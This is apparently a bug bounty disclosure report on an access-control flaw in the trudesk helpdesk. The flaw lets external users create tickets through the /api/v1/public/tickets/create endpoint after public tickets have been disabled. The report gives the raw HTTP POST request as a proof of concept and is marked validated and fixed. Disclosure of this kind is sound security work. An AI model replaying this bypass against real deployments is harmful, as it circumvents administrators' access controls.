Improper Privilege Management in polonel/trudesk


Reported on

Jun 15th 2021


external user can submit ticket even when its disabled


external user can submit ticket even when its disabled


1. First from admin account goto settings-->tickets and disallow Allow public tickets .
So, external user cant create ticket using url http://localhost:8118/newissue .

2. Now as a external user , sent bellow request which will create a public ticket

POST /api/v1/public/tickets/create HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 138
Origin: http://localhost:8118
DNT: 1
Connection: close
Referer: http://localhost:8118/newissue
Cookie: $trudesk%3Atimezone=America/New_York; connect.sid=s%3AbDPu1729Dob3ofg_TynNCd_EID7q1h3y.i5p4vnPCeYzyF2mqbEvcE4E%2BVZDHrjhkquUJxSvKbi0


So, despite of being disabled for public ticket creation , still user can create ticket


Chris validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris marked this as fixed with commit 17c2eb 2 years ago
Chris has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation